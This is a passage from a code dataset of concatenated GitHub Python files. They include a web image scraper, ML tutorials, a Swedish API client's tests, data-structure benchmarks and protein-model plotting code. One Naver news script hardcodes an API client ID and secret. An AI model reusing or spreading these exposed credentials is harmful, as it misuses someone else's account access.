return(gene_set)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"SimonGrouard/astra","sub_path":"result_interpretation.py","file_name":"result_interpretation.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19508946335","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nBASE_DIR = os.getcwd()\n\ndef make_path(url,target_path='picture'):\n dir_path = os.path.join(BASE_DIR, target_path)\n if os.path.exists(dir_path):\n pass\n else:\n os.mkdir(dir_path)\n\n response = requests.get(url=url)\n text = response.text\n soup = BeautifulSoup(text, 'html.parser')\n div_obj = soup.find(name='div', attrs={'class': 'lb_box'})\n img_list = div_obj.find_all_next(name='dt')\n dic = {}\n for i in img_list:\n dir_name = i.find(name='img').get(\"alt\").replace(\" \", \"-\")\n dir_href = i.find(name='a').get(\"href\")\n dic[dir_name] = dir_href\n return dic\n\ndef download_img(lst,name,dirname):\n for img in lst:\n img_url = img.get(\"src\").replace(\"113x113\",'740x-')\n img_content = requests.get(img_url).content\n file_name = img_url.rsplit('/', 1)[-1]\n file_path = os.path.join(BASE_DIR, dirname, name, file_name)\n try:\n with open(file_path, 'wb') as f:\n f.write(img_content)\n print(file_path, '爬取完毕')\n except OSError:\n print(file_path, '爬取失败')\n\ndef request_img(url,dirname):\n dic = make_path(url,dirname)\n for name, img_url in dic.items():\n dir_path = os.path.join(BASE_DIR, dirname, name)\n os.mkdir(dir_path)\n response2 = requests.get(url=img_url)\n text2 = response2.text\n soup2 = BeautifulSoup(text2, 'html.parser')\n div_obj2 = soup2.find(name='div', attrs={'class': 'overview'})\n if not div_obj2:\n continue\n img_list2 = div_obj2.find_all(name='img')\n download_img(img_list2, name,dirname)\n\nif __name__ == '__main__':\n url = 'http://www.yesky.com/c/6_20491.shtml'\n request_img(url,'picture3')","repo_name":"myin1994/mylearn","sub_path":"Python项目/day74/pa2.py","file_name":"pa2.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30258256343","text":"import requests\nimport pprint # json 데이터가 줄바꿈 해서 나오지 않고 한 줄로 나올 때 유용함!\n\nclient_id = \"NQiH7_sc1SAtNUlef0Rp\"\nclient_secret = \"8rqvp8AYlW\"\n\nnaver_open_api = \"https://openapi.naver.com/v1/search/news.json?query=android\"\nheader_params = {\"X-Naver-Client-id\":client_id, \"X-Naver-Client-Secret\":client_secret} # 일종의 JSON임\nres = requests.get(naver_open_api, headers=header_params)\n\nif res.status_code == 200: # 응답코드 200이면 정상. open API도 응답코드가 해당됨\n data = res.json()\n # pprint.pprint(data)\n for idx, item in enumerate(data['items']):\n print(str(idx+1) + '.', item['title'], '/ 링크: ', item['link'])\nelse: print(\"Error Code: \", res.status_code) ","repo_name":"Jiyul-Kim/study","sub_path":"LectureAndCourse/Inflearn__Python-Crawling/02_naver_news_json.py","file_name":"02_naver_news_json.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24551176637","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n############################################################\n# Created on: 2018-05-03\n# Author: Joe Aaron\n# Email: pant333@163.com\n# Description: 当用户输入敏感词语,则用 星号 * 替换,例如当用户输入「北京是个好城市」,则变成「**是个好城市」。\n############################################################\nimport string\n\nword_filter=set()\n\nwith open('source/0011/filtered_words.txt') as f:\n for w in f.readlines():\n word_filter.add(w.strip())\n \nwhile True:\n s=input()\n if s == 'exit':\n break\n for w in word_filter:\n if w in s:\n s= s.replace(w,'*'*len(w))\n print(s)\n ","repo_name":"joeaaron/LearningPython","sub_path":"Practice/练习册/0012.py","file_name":"0012.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10129814797","text":"from minaombud.client import MinaOmbudClient\nfrom minaombud.crypto.jwkset import JwkSet\nfrom minaombud.defaults import (\n MINA_OMBUD_API_CLIENT_ID,\n MINA_OMBUD_API_CLIENT_SECRET,\n MINA_OMBUD_API_TOKEN_URL,\n MINA_OMBUD_API_URL,\n MINA_OMBUD_SAMPLE_AUDIENCE,\n MINA_OMBUD_SAMPLE_ISSUER,\n MINA_OMBUD_SAMPLE_KEYS,\n MINA_OMBUD_SAMPLE_USER_DB,\n MINA_OMBUD_TREDJE_MAN\n)\nfrom minaombud.model import Identitetsbeteckning\nfrom minaombud.user import (\n create_user_token,\n load_user_database\n)\n\n\ndef _load_users():\n with open(MINA_OMBUD_SAMPLE_USER_DB) as f:\n return load_user_database(f)\n\n\nKEYS = JwkSet.load(MINA_OMBUD_SAMPLE_KEYS)\nUSERS = _load_users()\n\n\ndef new_user_token(u: str):\n return create_user_token(u, jwks=KEYS, users=USERS,\n audience=MINA_OMBUD_SAMPLE_AUDIENCE,\n issuer=MINA_OMBUD_SAMPLE_ISSUER)\n\n\ndef new_client():\n return MinaOmbudClient(service=\"test_client.py\", scope=\"user:self\",\n client_id=MINA_OMBUD_API_CLIENT_ID,\n client_secret=MINA_OMBUD_API_CLIENT_SECRET,\n url=MINA_OMBUD_API_URL,\n token_url=MINA_OMBUD_API_TOKEN_URL)\n\n\ndef test_sok_fullmakter():\n client = new_client()\n user_token = new_user_token(\"198602262381\")\n response = client.sok_fullmakter(tredjeman=MINA_OMBUD_TREDJE_MAN,\n fullmaktshavare=Identitetsbeteckning.from_id(\"198602262381\"),\n user_token=user_token)\n assert isinstance(response.fullmakter, list)\n\n\ndef test_sok_behorigheter():\n client = new_client()\n user_token = new_user_token(\"198602262381\")\n response = client.sok_behorigheter(tredjeman=MINA_OMBUD_TREDJE_MAN,\n fullmaktshavare=Identitetsbeteckning.from_id(\"198602262381\"),\n user_token=user_token)\n assert isinstance(response.kontext, list)\n","repo_name":"bolagsverket/mina-ombud-samples","sub_path":"python/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8653822560","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom tqdm import tqdm\nimport os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\n\n\nlr = 0.002\nepochs = 100\npredict_need = True\n\n\nclass TitanicData(Dataset):\n def __init__(self, filepath):\n # 不取‘Age‘是因为’Age‘有的sample缺省,干脆就不取了\n x_features = ['Pclass', 'Sex', 'SibSp', 'Parch', 'Fare']\n y_features = ['Survived']\n\n data = pd.read_csv(filepath)\n self.len = data.shape[0]\n\n # get_dummies是one_hot编码,实际上x_data的维度从6变成了7\n # x和y都采取data[features]的形式是为了使y也是矩阵,与x的shape相同\n self.x_data = torch.from_numpy(np.array(pd.get_dummies(data[x_features])))\n self.y_data = torch.from_numpy((np.array(data[y_features])))\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n return self.x_data[index], self.y_data[index]\n\n\nfilepath = r'../data/titanic/train.csv'\ntrain_set = TitanicData(filepath)\ntrain_loader = DataLoader(dataset=train_set, batch_size=32, shuffle=True, num_workers=0)\n\n\nclass LogisticRegression(torch.nn.Module):\n def __init__(self):\n super(LogisticRegression, self).__init__()\n self.linear1 = torch.nn.Linear(6, 3)\n self.linear2 = torch.nn.Linear(3, 1)\n self.sigmoid = torch.nn.Sigmoid()\n\n def forward(self, x):\n x = self.sigmoid(self.linear1(x))\n x = self.sigmoid(self.linear2(x))\n return x\n\n def predict(self, x):\n with torch.no_grad():\n x = self.sigmoid(self.linear1(x))\n x = self.sigmoid(self.linear2(x))\n print(x.shape)\n y = []\n for i in x:\n y.append(1 if i >= 0.5 else 0)\n return y\n\n\nmodel = LogisticRegression()\n\n\ncriterion = torch.nn.BCELoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=lr)\n\n\ndef show_lossimage(epoch_list, loss_list):\n plt.plot(epoch_list, loss_list)\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.show()\n\n\nif __name__ == '__main__':\n epoch_list = []\n loss_list = []\n for epoch in range(epochs):\n epoch_loss = 0\n for i, data in enumerate(train_loader):\n x, y = data\n x = x.float() # 要进行数据类型转换,否则会报错,但是是为什么呢?\n y = y.float()\n y_hat = model(x)\n\n loss = criterion(y_hat, y)\n\n loss.backward()\n epoch_loss += loss.item()\n\n optimizer.step()\n optimizer.zero_grad()\n epoch_loss /= (i+1)\n print('epoch={}, loss={}'.format(epoch+1, epoch_loss))\n epoch_list.append(epoch+1)\n loss_list.append(epoch_loss)\n\n show_lossimage(epoch_list, loss_list)\n\n # predict\n if predict_need:\n # prepare the test dataset\n test_filepath = r'../data/titanic/test.csv'\n test_data = pd.read_csv(test_filepath)\n x_features = ['Pclass', 'Sex', 'SibSp', 'Parch', 'Fare']\n # 数据类型经历df, np.ndarray, tensor\n x = torch.from_numpy(np.array(pd.get_dummies(test_data[x_features])))\n\n # get the prediction\n y_pred = model.predict(x.float())\n\n # save the prediction in csv\n outputs = pd.DataFrame({'PassengerId': test_data.PassengerId, 'Survived': y_pred})\n outputs.to_csv(r'../TitanicPredict.csv', index=False) # False表示不保存索引","repo_name":"LennonLau/PyTorch-practice","sub_path":"chapter8_Titanic.py","file_name":"chapter8_Titanic.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29415414863","text":"import pandas as pd\n\n'''data=pd.read_csv('Carcount.csv')\ndata=data.sort_values(by='count', ascending=False)\nprint(data)\n\ndf=data[data['count']>12]\nprint(df)\n# df.to_csv('maxcarcaount_3.csv')\n# df['xmax']-df['xmin'] > threshold\n# df[df['JobTitle'].value_counts()<2])'''\n\ndata = pd.read_csv(\"/home/mayank-s/PycharmProjects/Datasets/Berkely_DeepDrive/berkely_train.csv\")\n# data=pd.read_csv('/home/mayank-s/Desktop/Link to Datasets/aptiveBB/reddy.csv')\nprint(data.head())\nprint(data.groupby('class').count())\n\n# this is done to remove if xmin==xmax and ymin==yamax(which is actuallly wrong)\ndf = data[(data['xmin'] != data['xmax']) & (data['ymin'] != data['ymax'])]\n\nprint(df.head())\n\n# df.to_csv(\"berkely_After_filter.csv\")\n\n# this is most important funtion to count no of class in group\nnew = data.groupby(['filename'])['class'].count()\n\ngb = data.groupby(['filename'])\ngrouped_C = gb['class']\nn = data.groupby(['filename', 'class'])\na = (n.size())\nprint(a)\ngv = a.index[0]\n\nfor file_name, (cls) in enumerate(a):\n print(file_name)\n print(cls)\nnew1 = data.groupby(['filename', 'class'])['xmin'] # .count()\n\n# b=data.groupby(level=['filname', 'class']).sum()\n\n\nmydata = data.groupby('filename')\nprint(data.groupby('class').count())\nlen_group = mydata.ngroups\n# index=mydata.groups['car'].values\nmygroup = mydata.groups\n\n# new=data.groupby(['filename', 'class'])#['car'].count()\n\n# this is most important funtion to count no of class in group\nnew = data.groupby(['filename'])['class'].count()\n\nfor da in mygroup.keys():\n index = mydata.groups[da].values\n for read_index in index():\n print(index)\n print(da)\n break\n\n'''for da in mydata.ngroups():\n\n index = mydata.groups['car'].values\n mydata.groups['0124dfa6-385f1b58'].values\n print(da)'''\n\n# index=mydata.groups['car'].values\n'''pyindex=np.random.choice(index, size=10000, replace=False)\ndata.drop(data.index[pyindex],inplace=True)\nprint(data.groupby('class').count())\n\ndf=data.replace(\"motor\", \"cool\")\ndf=df.replace(\"bike\", \"cool\")\ndf=df.replace(\"cool\", \"motorbike\")\ndf=df.replace(\"traffic light\", \"traffic_light\")\ndf=df.replace(\"traffic sign \", \"traffic_sign \")\nprint(df.groupby('class').count())\ndata.to_csv(\"berkely_train_new_1.csv\")\nprint(1)'''\n","repo_name":"mayanks888/AI","sub_path":"Python/python_code/more data prepocessing.py","file_name":"more data prepocessing.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17233001959","text":"import pandas as pd\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\n\n# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\n# load the data\ndata = pd.read_csv('C:\\\\Users\\\\ehold\\\\Desktop\\\\Folders\\\\Datasets\\\\melb_data.csv')\n\n# Select target\ny = data.Price\n\n# To keep things simple, we'll use only numerical predictors\nmelb_predictors = data.drop(['Price'], axis=1)\nX = melb_predictors.select_dtypes(exclude=['object'])\n\n# Divide data into training and validation subsets\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, train_size=0.8, test_size=0.2,\n random_state=0)\ndef score_dataset(X_train, X_valid, y_train, y_valid):\n model = RandomForestRegressor(n_estimators=10, random_state=0)\n model.fit(X_train, y_train)\n preds = model.predict(X_valid)\n return mean_absolute_error(y_valid, preds)\n\ndef missingValues(X_train, X_valid, y_train, y_valid):\n # there are 3 ways to deal with missing values\n # drop columns with missing values - downside is model loses access to alot of potential information\n # imputation - filling in missing values with some number - i.e. the mean of the column - usually leads to a more accurate model than dropping\n # extending imputation - impute the missing values, add a new column to make not of the imputed entries w/ true/false\n\n # examining data\n # Shape of training data (num_rows, num_columns)\n print(X_train.shape)\n\n # Number of missing values in each column of training data\n missing_val_count_by_column = (X_train.isnull().sum())\n print(missing_val_count_by_column[missing_val_count_by_column > 0])\n\n cols_with_missing = [col for col in X_train.columns if X_train[col].isnull().any()]\n\n approach_to_use = 3\n\n if approach_to_use == 1:\n # first approach - dropping missing values\n reduced_X_train = X_train.drop(cols_with_missing, axis=1)\n reduced_X_valid = X_valid.drop(cols_with_missing, axis=1)\n\n print(\"MAE from Approach 1 (Drop columns with missing values):\")\n print(score_dataset(reduced_X_train, reduced_X_valid, y_train, y_valid))\n elif approach_to_use == 2:\n # second approach - imputing missing values with the mean of each column with simple imputer\n my_imputer = SimpleImputer()\n imputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))\n imputed_X_valid = pd.DataFrame(my_imputer.transform(X_valid))\n\n # Imputation removed column names; put them back\n imputed_X_train.columns = X_train.columns\n imputed_X_valid.columns = X_valid.columns\n\n print(\"MAE from Approach 2 (Imputation):\")\n print(score_dataset(imputed_X_train, imputed_X_valid, y_train, y_valid))\n elif approach_to_use == 3:\n # third approach - imputing missing values with the mean of each column then making a new column to mark the rows imputed\n # Make copy to avoid changing original data (when imputing)\n X_train_plus = X_train.copy()\n X_valid_plus = X_valid.copy()\n\n # Make new columns indicating what will be imputed\n for col in cols_with_missing:\n X_train_plus[col + '_was_missing'] = X_train_plus[col].isnull()\n X_valid_plus[col + '_was_missing'] = X_valid_plus[col].isnull()\n\n # Imputation\n my_imputer = SimpleImputer()\n imputed_X_train_plus = pd.DataFrame(my_imputer.fit_transform(X_train_plus))\n imputed_X_valid_plus = pd.DataFrame(my_imputer.transform(X_valid_plus))\n\n # Imputation removed column names; put them back\n imputed_X_train_plus.columns = X_train_plus.columns\n imputed_X_valid_plus.columns = X_valid_plus.columns\n\n print(\"MAE from Approach 3 (An Extension to Imputation):\")\n print(score_dataset(imputed_X_train_plus, imputed_X_valid_plus, y_train, y_valid))\n\n\n\nmissingValues(X_train, X_valid, y_train, y_valid)\n\n","repo_name":"eric-holdener/IntermediateMachineLearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11032522453","text":"from ctypes import cdll\nfrom _ctypes import CFuncPtr\n\n\n\ndef make_dll_meta(dll_path):\n class DllMeta(type):\n def __new__(mcs, what, bases, attr_dict):\n import sys\n sys.stderr.write('欢迎使用\\n')\n cls = super().__new__(mcs, what, bases, attr_dict)\n dll = cdll.LoadLibrary(dll_path)\n for f_name, f in vars(cls).items():\n if not callable(f):\n continue\n if hasattr(dll, f_name) and isinstance(getattr(dll, f_name), CFuncPtr):\n setattr(cls, f_name, staticmethod(getattr(dll, f_name)))\n cls.__dll = dll\n return cls\n\n # def close(cls):\n # if hasattr(cls, \"close\"):\n # cls.close(cls)\n #\n # def __del__(self):\n # self.close()\n\n return DllMeta\n","repo_name":"ItGarbager/aimcf_yolov5","sub_path":"utils/now/dll_meta.py","file_name":"dll_meta.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"48"} +{"seq_id":"23175997382","text":"from django.http import HttpRequest\nfrom django.shortcuts import render\nfrom utils.decorators import permission_checker_decorator_factory\nfrom car_repair_request.models import CarRepairRequest\n\n# Create your views here.\nfrom django.views.generic import FormView\n\n\n@permission_checker_decorator_factory()\ndef index(request: HttpRequest):\n current_user_id = request.user.id\n car_repairs = CarRepairRequest.objects.filter(user_id=current_user_id).all()\n repaired = CarRepairRequest.objects.filter(user_id=current_user_id, is_fixed=True).all()\n working = CarRepairRequest.objects.filter(user_id=current_user_id, is_fixed=False).all()\n print(request.user.username)\n context = {\n 'repairs': car_repairs,\n 'repaired': repaired,\n 'working': working\n }\n return render(request, 'home_module/index.html', context)\n\n\n","repo_name":"mesutfd/repair-it","sub_path":"home_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37237068602","text":"\nclass LinkedList:\n def __init__(self, data):\n self.data = data\n self.next = None\n \n def append_node(self, data):\n if self.next == None:\n self.next = LinkedList(data)\n else:\n self.next.append_node(data)\n \n def append_nodes(self, dataList):\n for data in dataList:\n self.append_node(data)\n return self\n\n def insert_node(self, data, position):\n if position == 0:\n new_node = LinkedList(data)\n new_node.next = self\n return new_node\n\n elif position == 1:\n new_node = LinkedList(data)\n new_node.next = self.next\n self.next = new_node\n return self\n\n else:\n if self.next is None:\n raise ValueError(\"Position out of range\")\n self.next = self.next.insert_node(data, position - 1)\n return self\n \n def remove_node(self, data):\n if self.data == data:\n return self.next\n else:\n if self.next is None:\n raise ValueError(\"Data not in list\")\n self.next = self.next.remove_node(data)\n return self\n \n def search_node(self, data):\n if self.data == data:\n return True\n else:\n if self.next is None:\n return False\n return self.next.search_node(data)\n \n def get_list(self):\n print(self.data, end=\", \")\n if self.next != None:\n self.next.get_list()\n\n\nclass BinarySearchTree:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def add_value(self, data):\n if data < self.data:\n if self.left is None:\n self.left = BinarySearchTree(data)\n else:\n self.left.add_value(data)\n elif data > self.data:\n if self.right is None:\n self.right = BinarySearchTree(data)\n else:\n self.right.add_value(data)\n else:\n print(\"Value already in tree\")\n\n def add_values(self, dataList):\n for data in dataList:\n self.add_value(data)\n return self\n\n def remove_value(self, data):\n if data < self.data:\n if self.left is None:\n raise ValueError(\"Data not in tree\")\n self.left = self.left.remove_value(data)\n return self\n elif data > self.data:\n if self.right is None:\n raise ValueError(\"Data not in tree\")\n self.right = self.right.remove_value(data)\n return self\n else:\n if self.left is None and self.right is None:\n return None\n elif self.left is None:\n return self.right\n elif self.right is None:\n return self.left\n else:\n self.data = self.right.get_min()\n self.right = self.right.remove_value(self.data)\n return self\n \n def get_min(self):\n if self.left is None:\n return self.data\n else:\n return self.left.get_min()\n \n def search_value(self, data):\n if data < self.data:\n if self.left is None:\n return False\n return self.left.search_value(data)\n elif data > self.data:\n if self.right is None:\n return False\n return self.right.search_value(data)\n else:\n return True\n \n def get_tree(self):\n print(self.data, end=\", \")\n if self.left != None:\n self.left.get_tree()\n if self.right != None:\n self.right.get_tree()\n\n\nfrom HashMap import HashMap\nfrom Array import Array\nfrom random import randint\nfrom time import time\n\nif __name__ == \"__main__\":\n print(\"\\nTHIS IS THE DATA STRUCTURE COMPARATIVE STUDY\")\n print(\"The available data structures are LinkedLists, Binary Search Trees, Hash Maps, and Arrays.\")\n size = int(input(\"\\nPlease input the size of these data structures: \"))\n items = set()\n while len(items) < size:\n items.add(randint(0, size*2))\n items = list(items)\n\n print(\"\\nCreating Data Structures...\")\n linked_list = LinkedList(items[0])\n linked_list.append_nodes(items[1:])\n\n binary_search_tree = BinarySearchTree(items[0])\n binary_search_tree.add_values(items[1:])\n\n hash_map = HashMap()\n hash_map.add_values(items)\n\n array = Array(items)\n print(\"Done!\")\n\n while True:\n choice = int(input(\"\"\"\\nNext, please enter a function you would like to benchmark for each of the data structures:\n1. Insert (at beginning)\n2. Search\n3. Remove\n4. Print\n5. Exit\n\nChoice: \"\"\"))\n \n if choice == 1:\n ele = int(input(\"Please enter the element you would like to insert: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list = linked_list.insert_node(ele, 0)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.add_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.add_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.insert_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 2:\n ele = int(input(\"Please enter the element you would like to search for: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list.search_node(ele)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.search_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.search_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.search_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 3:\n ele = int(input(\"Please enter the element you would like to remove: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list = linked_list.remove_node(ele)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.remove_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.remove_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.remove_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 4:\n print(\"\\nThe data structures currently are:\")\n print(f\"Linked List: \")\n linked_list.get_list()\n print(\"None\")\n\n print(f\"Binary Search Tree: \")\n binary_search_tree.get_tree()\n print(\"End\")\n\n hash_map.print_hash_map_readable()\n array.print_array()\n\n else:\n exit(1)","repo_name":"AdityaHegde712/Compiler-Design-problems","sub_path":"Activity 8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39606762170","text":"import sys\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\nfrom GuiTests.Gui.Layouts import LAbsolute, LBoxLayout, LQGridLayout\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n layout = LQGridLayout.LQGridLayout()\n\n layout.__initUI__(self)\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"kmietek/ExchangeSpy","sub_path":"GuiTests/Gui/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28417664189","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.nn import KLDivLoss\nimport os\nimport itertools\nfrom scipy import stats\nimport numpy as np\nimport seaborn as sns\nimport difflib\nfrom itertools import chain\nfrom evodiff.utils import extract_seq_a3m, csv_to_dict, normalize_list, removekey, get_matrix, get_pairs, normalize_matrix, \\\n get_pairwise\n\ndef aa_reconstruction_parity_plot(project_dir, out_path, generate_file, msa=False, idr=False, gen_file=True,\n start_valid=False, start_query=False, start_msa=False):\n \"Parity plots for generated vs test (for sequence models) or valid (for MSA models)\"\n # Load in approx train distribution\n idr_flag = \"\"\n # Eliminate BXJOU for KL since they occur at 0 freq in test dataset\n keys_to_remove = ['B', 'Z', 'J', 'O', 'U'] #, '-']\n if msa:\n if start_valid:\n if start_query:\n valid_file = 'valid_msas_onlymsa.txt'\n elif start_msa:\n valid_file = 'valid_msas_onlyquery.txt'\n keys_to_remove += ['-']\n else:\n valid_file = 'valid_msas.a3m'\n valid_file = out_path + '/' + valid_file\n #print(valid_file)\n aminos = csv_to_dict(valid_file)\n values = list(aminos.values())\n else:\n file = project_dir + 'ref/openfold_ref.csv'\n else:\n file = project_dir + 'ref/uniref50_aa_ref_test.csv' # TODO add file to git\n #print(file)\n if idr:\n idr_flag = 'idr_'\n true_file = out_path + 'data_idr.csv'\n aminos = csv_to_dict(true_file)\n values = aminos.values()\n #print(aminos, values)\n elif not idr and not start_valid:\n df = pd.read_csv(file)\n aminos = df.to_dict('list')\n values = [each[0] for each in aminos.values()]\n if gen_file:\n gen_flag = ''\n # Load in generated seqs and count values\n generate_file = out_path + generate_file\n aminos_gen = csv_to_dict(generate_file)\n #print(\"aminos gen\", aminos_gen)\n else:\n gen_flag = '_train_only'\n # Normalize scores\n a = normalize_list(values) # normalize(list(aminos.values()))\n if start_valid:\n a_kl = normalize_list(list(removekey(aminos, keys_to_remove).values()))\n else:\n #print(aminos)\n a_kl = normalize_list([each[0] for each in removekey(aminos, keys_to_remove).values()])\n if gen_file:\n b_list = list(aminos_gen.values())\n b = normalize_list(b_list) # ADD GAPS IN\n # Save KL to file\n kl_loss = KLDivLoss(reduction=\"sum\")\n if msa:\n b_kl = normalize_list(list(removekey(aminos_gen, keys_to_remove).values()))\n #print(len(a_kl), len(b_kl))\n #print(a_kl, b_kl)\n kl = kl_loss(torch.tensor(a_kl).log(), torch.tensor(b_kl)).item()\n else:\n if idr:\n b_kl = torch.tensor(b[0:20])\n kl = kl_loss(torch.tensor(a[0:20]).log(), torch.tensor(b[0:20])).item()\n else:\n b_kl = torch.tensor(b[0:21])\n kl = kl_loss(torch.tensor(a[0:21]).log(), torch.tensor(b[0:21])).item()\n print(\"KL\", kl)\n with open(out_path + idr_flag + 'generate_metrics.csv', 'w') as f:\n f.write(\"aa freq kl:\" + str(kl))\n f.close()\n kl_label = \"$KL$=%.3f\" % (kl)\n\n # Plot\n colors = ['black', 'grey', 'lightcoral', 'brown', 'tomato', 'peru',\n 'darkorange', 'goldenrod', 'khaki', 'olive', 'yellow', 'olivedrab',\n 'yellowgreen', 'palegreen', 'forestgreen', 'turquoise', 'paleturquoise',\n 'cyan', 'deepskyblue', 'dodgerblue', 'royalblue', 'navy', 'blue',\n 'darkslateblue', 'mediumpurple', 'darkviolet', 'violet', 'mediumvioletred',\n 'crimson', 'lightpink']\n fig, ax = plt.subplots(figsize=(3, 2.5))\n annotations = list(aminos_gen.keys())[0:len(a)]\n plt.axline([0, 0], [0.1, 0.1], c='k', linestyle='dotted', alpha=0.75)\n for i, label in enumerate(annotations):\n plt.scatter(a[i], b[i], label=label, c=colors[i], edgecolors='k')\n ax.text(0.05, 0.95, kl_label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.xlabel(\"Test Freq\", fontweight='bold')\n plt.ylabel(\"Gen Freq\", fontweight='bold')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, idr_flag+'parity_scatter.svg'))\n fig.savefig(os.path.join(out_path, idr_flag+'parity_scatter.png'))\n plt.close()\n if not gen_file:\n return a # return train probability distribution\n\n\ndef msa_substitution_rate(generated_msa, train_msa, alphabet, out_path):\n \"Plot substitution rates for generated MSAs\"\n print(alphabet, \"len: \", len(alphabet))\n all_aa = np.arange(len(alphabet))\n all_aa_pairs = list(itertools.product(all_aa, all_aa))\n\n all_pairs_train = get_pairs(train_msa, alphabet)\n train_matrix = get_matrix(all_pairs_train, all_aa_pairs, alphabet)\n print(\"train len\", len(all_pairs_train))\n train_table, train_vals, train_diag_vals = normalize_matrix(train_matrix.T, alphabet)\n\n all_pairs_gen = get_pairs(generated_msa, alphabet)\n print(\"gen len\", len(all_pairs_gen))\n gen_matrix = get_matrix(all_pairs_gen, all_aa_pairs, alphabet)\n gen_table, gen_vals, gen_diag_vals = normalize_matrix(gen_matrix.T, alphabet)\n\n # Plot substitution data as heatmaps\n vmax = 0.4\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.heatmap(train_table, annot=False, cmap='Greens', vmin=0, vmax=vmax, ax=ax)\n ax.set_title('Train Substitution Freq', weight='bold', fontsize=14)\n fig.savefig(os.path.join(out_path, 'train_heatmap.svg'))\n fig.savefig(os.path.join(out_path, 'train_heatmap.png'))\n\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.heatmap(gen_table, annot=False, cmap='Greens', vmin=0, vmax=vmax, ax=ax)\n ax.set_title('Gen Substitution Freq', weight='bold', fontsize=14)\n fig.savefig(os.path.join(out_path, 'gen_heatmap.svg'))\n fig.savefig(os.path.join(out_path, 'gen_heatmap.png'))\n\n # Plot substitution parity per AA\n fig, axes = plt.subplots(6, 5, figsize=(12, 15))\n for i, ax in enumerate(axes.ravel()[:len(alphabet)]):\n r_squared = stats.pearsonr(train_vals[i, :], gen_vals[i, :]).statistic\n label = \"$R$=%.2f\" % (r_squared)\n # mse = mean_squared_error(train_vals[i,:], gen_vals[i,:])\n # label = \"$mse$=%0.2f\"%(mse)\n ax.set_title(alphabet[i], fontsize=14, weight='bold')\n ax.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n ax.scatter(train_vals[i, :], gen_vals[i, :], 